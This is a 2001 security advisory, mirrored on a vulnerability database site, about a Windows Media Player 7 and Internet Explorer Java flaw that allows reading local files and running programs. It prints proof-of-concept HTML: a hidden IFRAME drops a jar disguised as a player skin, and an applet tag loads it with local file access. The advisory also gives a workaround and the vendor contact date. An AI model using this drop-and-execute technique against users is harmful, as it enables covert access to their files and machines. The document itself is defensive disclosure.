Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:1159
HistoryJan 16, 2001 - 12:00 a.m.

Windows Media Player 7 and IE java vulnerability - executing arbitrary programs

2001-01-1600:00:00
vulners.com
12
JSON

Georgi Guninski security advisory #35, 2001

Windows Media Player 7 and IE java vulnerability - executing arbitrary programs

Systems affected:
Windows Media Player 7 and IE

Risk: High
Date: 15 January 2001

Legal Notice:
This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute it
unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's
written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any
company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or indirect use of the
information
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this advisory
or program or
any derivatives thereof.

Description:

There is a security vulnerability in Windows Media Player 7 exploitable thru
IE and java
which allows reading local files and browsing directories which in turn allows
executing
arbitratrary programs. This may lead to taking full control over user's
computer.

Details:
The problem is WMP skins are installed in a known directory and with a known
name:
"C:/Program files/Windows Media Player/Skins/SKIN.WMZ" : <IFRAME
SRC="wmp2.wmz"></IFRAME>
will download wmp2.wmz and place it in "C:/Program files/Windows Media
Player/Skins/wmp2.wmz".
wmp2.wmz may be a java jar archive. The following applet tag:

<APPLET CODEBASE="file://c:/" ARCHIVE="Program files/Windows Media
Player/SKINS/wmp2.wmz"
CODE="gjavacodebase.class" WIDTH=700 HEIGHT=300>
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>

will be executed with codebase="file://c:/" and the applet will have read only
access to C:\.

The code is:
--------wmp7-3.html--------------------------------------------------
<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
<SCRIPT>
function f()
{
window.open("wmp7-3a.html");
}
setTimeout("f()",4000);
</SCRIPT>

------wmp7-3a.html---------------------------------------------------
<APPLET CODEBASE="file://c:/"
ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz"
CODE="gjavacodebase.class"
WIDTH=700 HEIGHT=300>
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>

Workaround:
Disable Java.

Demonstration is available at:
http://www.guninski.com/wmp7-3.html

Vendor status:
Microsoft was contacted on 11 January 2001.

Regards,
Georgi Guninski
http://www.guninski.com

JSON